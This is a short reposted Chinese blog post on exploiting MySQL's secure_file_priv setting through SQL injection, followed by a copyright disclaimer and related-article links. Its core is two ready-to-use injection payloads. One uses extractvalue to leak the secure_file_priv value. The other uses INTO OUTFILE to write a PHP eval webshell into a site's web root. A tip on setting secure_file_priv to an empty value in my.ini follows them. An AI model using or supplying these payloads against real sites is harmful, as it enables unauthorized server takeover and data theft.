查看mysql是否有文件讀寫權限，sql注入查詢secure_file_priv權限

本文轉載自查看原文 2021-05-24 20:02 3354 SQL

show VARIABLES like '%secure%'

sql注入中的使用方法

查詢secure_file_priv權限
?id=43 ) and extractvalue(1, concat(0x7e, (select @@global.secure_file_priv),0x7e)) --+(

寫shell
?id=43 ) and extractvalue(1, concat(0x7e, (select “<?php @eval($_POST['pass']);?>” INTO OUTFILE “D:\wwwroot\xxx.com\Runtime\2.php”),0x7e)) --+(

如果不顯示需要配置my.ini

添加secure_file_priv=""

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 MYSQL新特性secure_file_priv讀寫文件 MYSQL新特性secure_file_priv對讀寫文件的影響 mysql --secure_file_priv的設置 mysql之突破secure_file_priv寫shell mysql之突破secure_file_priv寫webshell 解決Mysql 8.0中secure_file_priv的問題 sql注入--高權限，load_file讀寫文件 MYSQL數據導出與導入，secure_file_priv參數設置 Mysql 導入文件提示 --secure-file-priv option 問題 secure_file_priv 配置項對數據導入導出的影響